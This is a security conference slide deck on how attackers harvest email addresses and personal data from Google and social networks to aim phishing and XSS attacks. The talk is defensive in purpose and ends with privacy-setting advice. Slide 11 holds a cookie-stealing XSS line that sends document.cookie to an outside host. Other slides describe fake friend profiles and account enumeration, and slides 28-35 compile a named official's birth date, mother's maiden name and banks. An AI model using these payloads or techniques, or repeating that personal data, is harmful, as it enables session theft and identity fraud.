Anti Social Networking Ken Munro SecureTest Ltd

1
Anti Social Networking?Ken MunroSecureTest Ltd
2
Who are we?

• SecureTest
• Penetration testers
• Largest test team in Europe
• CHECK, CREST PCI accredited
• Look at the real world of security too
• Not just the latest and greatest exploit
• Though we do a bit of that as well!

3
Why does this interest me?

• Its not so easy to hack a given site any more
• Though web apps often give way
• Script kiddie hacking is moving towards SMEs
• VISA noted that over 80 of attacks involving
  card data theft were level 4 merchants under PCI
  (
  
• So the big prizes arent as easy to get
• Which means the attacker needs more info needs
  to exploit new attack vectors

4
Email
5
Email borne attacks

• Phishing scatter gun
• Too easy to spot
• At least for those who know how

6
A poor example
7
View HTML source
8
Looks a bit phishy!
9
Email borne attacks

• Cross site scripting
• Executable javascript code, usually contained in
  a URI
  
• Follow the link from a plausible email that you
  received
  
• And watch as your session cookie gets pinched

10
A better example. Would you click?
11
Some sample XSS code

• How to steal MySpace sessions
• Promise you wont try this at home!
• javascriptvar a document.cookie.split("")var
  msg""for(var i0i
  alert(msg)
  
• new Image().src"http//haqr.org/steal?c"
  encodeURI(document.cookie)
  

12
Last month the first high profile use of XSS
13
How it was done

• Creates a fake login form, in the victims browser
  instance
  
• Redirects form input to third party

14
Why XSS in a presentation about social networking?

• We know what the threat is
• Credential theft, account compromise, session
  stealing
  
• Anything you can do with javascript, they can do
  better
  
• But how do you deliver it?
• If you send your attack out scatter gun
• Itll quickly be picked up
• ISPs, anti phishing services, the target
  organisation (perhaps a bank?)
  
• So if your attack is going to succeed, you need
  to send it to a small number of users of that
  (online banking?) application
  
• So where do you find your victims to target?

15
Who needs a social networking site?

• Everyone overlooks Google, with the hype around
  Facebook etc
  
• And FriendsReunited!
• Fun with Google Groups Blogs
• Try searching Google Groups for
• _at_yourcompany.com
• See what you find
• Almost invariably we collect large numbers of
  email addresses, usually involving IT-related
  queries
  

16
Googler

• Making it even easier
• Googler.py is a Python script we wrote which
  searches Google filters the results
  
• Anything that Google has indexed with your email
  domain in
  
• Web sites with contact details
• Forums
• Newsgroups etc

17
Googler survey

• Quick look at the email domains of 10 companies
  in the FTSE.
  
• 10 minutes work had 1,047 individuals work email
  addresses
  
• Aliases help prevent name disclosure
• But they dont stop the email getting there

18
Email address disclosure

• The target list for your targeted attack
• Some organisations are vastly better than others
• At the very least, use aliases
• Though that doesnt stop the email from getting
  to someone
  
• You just dont know who to!
• Obfuscate any public postings (RIPE etc)
• Use anonymous web mail accounts to make postings
  with
  
• And dont mention the company name in the
  posting!
  
• Check exposure every quarter

19
But that was only corporate addresses

• If were trying to deliver an attack, we need to
  know it works on customers of the organisation
  were targeting
  
• How about compromising customers of Amazon?
• We need their email addresses, but a Google
  search wouldnt tell us if they were customers

20
Authentication
21
(No Transcript)
22
(No Transcript)
23
(No Transcript)
24
Enumeration

• Gives you the email addresses of the online
  stores customers
  
• Perfect for delivering your attack, exploiting an
  XSS on the stores web site
  
• Accounts compromised, customers details stolen
• Processes for dealing with failed authentication
  or resets are often the weak point
  
• Results of our annual survey showed 62 of major
  online retailers had the same problem

25
But we really want to steal everything

• So how do we steal the victims identity?
• Could intercept their post or rubbish
• I dont like getting my hands dirty!

26
How do people authenticate?

• Employee ID?
• Mothers maiden name
• Date of birth
• Employment start date
• Home post code
• Place of birth
• Some form of challenge/response?
• Any more?
• Shouldnt this information be hard to obtain?
• Call the target, claim to be their bank, ask them
  to authenticate!

27
An example

• A public figure
• The Information Commissioner
• But he doesnt have a Facebook or MySpace
  account
  
• Who cares?

28
http//www.ico.gov.uk/about_us/who_we_are/manageme
nt_board.aspx
29
http//politics.guardian.co.uk/foi/story/0,,151865
7,00.html

• Lives in Reigate
• Age 56 in 2005
• Brought up in Southend
• Children Andrew, Gemma Chris
• Career history
• Southampton Uni
• Boarded at Bishops Stortford

30
Too easy!
31
http//p10.hostingprod.com/_at_spyblog.org.uk/blog/fo
ia/information_commissioner/

• Date of Birth
• 18th June 1949
• More information was disclosed in this FOI
  request than actually requested!

32
Other useful information

• Movements
• Office address in Cheshire, where he works two
  days per week two days/week in London. He flies
  from Gatwick to Manchester
  
• Work email address
• Richard.thomas_at_ico.gsi.gov.uk
• Married to Julia Clarke on 1974 in Bracknell
• A partner at Clifford Chance?
• Mothers maiden name?

33
192.Com search of births
34
The actual register of the ICOs birth

• Mothers maiden name is James

35
And where he banks

• Coventry Building Society (savings)
• Nationwide Building Society (savings)
• National Savings (Equity Bond)
• Invesco Perpetual (ISA investment)
• Scottish Widows (Personal Pension and Endowment)
  
  
• Edinburgh Portfolio (Personal Pension)
• Standard Life (Personal Pension and Endowment)
• Merrill Lynch (Personal Pension)
• All the above contain 25K
• All because of Reigate

36
But that was too easy

• Not everyone is a public figure
• Few of us have to disclose information by
  statute
  
• Though seemingly innocent information about
  ourselves can provide the links that the attacker
  needs
  
• Does it matter that you live in Reigate, have 3
  children and a wife called Julia?
  
• Why give away that information if you dont need
  to?
  
• Time to profile yourselves

37
Social Networking?
38
Facebook and MySpace

• These are excellent sources of information about
  people who arent in the public eye
  
• MySpace is easier, as its rare to find pages
  that are protected
  
• Its also more popular!
• Facebook is a little harder, as one usually has
  to be a friend of the target
  
• An example of the information one can get

39
(No Transcript)
40
How do we get access to the profile?

• In most cases, we can only see the friends of
  the victim, not their profile, unless were their
  friend
  
• So we create a fake account in the name of one of
  their friends
  
• Copy the photograph from the real friend
• Add the target to our friends, with a covering
  message
  
• Ive set up a new profile
• And the victim accepts us

41
Forged invite (Using a fake account)
42
Now weve got his email address

• Lets see if he has an account on Amazon
• LinkedIn
• MySpace
• GoogleMail
• Harder
• Now we can mine the password against one of the
  above that doesnt have a lock out on the login
  
• I wonder if he uses common passwords?

43
The Profile Menu

• Ensure that all categories are set so only
  recognised friends or where possible yourself or
  no one can see information
  
• Concentrate on areas relating to contact
  information as these can be used in social
  engineering
  
• De-activate your wall

44
The Search Menu

• Ensure on friends can locate you in a search
• Prevent any other users from viewing any aspect
  of your profile
  
• This will prevent new friends contacting you
  allowing secure associations to be made

45
The News Feed Menu

• Uncheck all boxes to prevent friends monitoring
  your application usage and contacts

46
The Poke, Message and Friend Request Menu

• Prevent anyone you contact from viewing your
  profile

47
And Finally

• Do not install any applications
• This can allow information leakage and tracking
  of your Facebook usage
  
• Be careful who you choose as friends
• Make sure the person you add is the person you
  think it is!
  
• Preferably speak to them in person or over the
  phone to confirm their identity before accepting
  them.

48
Facebook and Wireless hot spots

• Facebook authentication is encrypted
• But for performance, it drops back to HTTP after
  authentication
  
• So, in an environment where traffic sniffing is
  possible
  
• Hot spot
• Hub network
• Shared internet connection
• ISP staff
• ARP-spoofed switched network
• Anyone can sniff your exchanges on Facebook
• And Messenger conversations
• And unencrypted logins
• And.

49
New developments

• Web applications are becoming available that can
  carry out much of the profiling automatically
  
• Take a look at Maltego (www.paterva.com)
• www.pipl.com searches the deep web
• Google indexes Internet
  
• It uses numerous public information resources to
  profile people and organisations
  
• The above will submit your query to other
  engines
  
• In their infancy, but rather scary
• They are capable of a bizarre degree of
  vulnerability discovery

50
So what?

• What did we actually achieve?
• Does anyone really care?
• Would your bank / credit card provider refund
  spending made on your card in the event of ID
  theft?
  
• What about the company you work for?
• The bar has been raised to hackers, but at the
  same time new sources of the information they
  need have become available
  

51
Somebody cared enough

• Yaron Bolandi
• Charged with crimes relating to 220M near-theft
  at Sumitomo Mitsui
  
• Social engineering and keylogging

52
Ideas that may help

• Facebook can easily be configured not to show
  friends
  
• If you cant access the profile, most of the
  problem is solved
  
• Preventing access from the corporate network is
  another matter!
  
• People often forget old profiles from
  out-of-favour networking sites
  
• Friends Reunited, for example
• Stop staff making postings or otherwise
  disclosing their work email addresses
  
• Easily checked for
• Join groups relating to your organisation, may be
  worth reviewing whats being said/disclosed about
  your business
  

53
Thoughts

• Hard to block Facebook access
• Particularly if it becomes a business networking
  tool
  
• How about blocking the Facebook email domain
  using your mail filters?
  
• An easy way to social engineer information out of
  your staff
  
• At least Facebook has some protection, though
  its easily bypassed
  
• Staff education, sadly, is one of the few
  defences
  
• Profile your business (Facebook groups), profile
  yourself
  
• See how deep the wormhole goes

54
Any Questions?Slides available on
requestken.munro_at_securetest.com
And NO I dont have a Facebook account!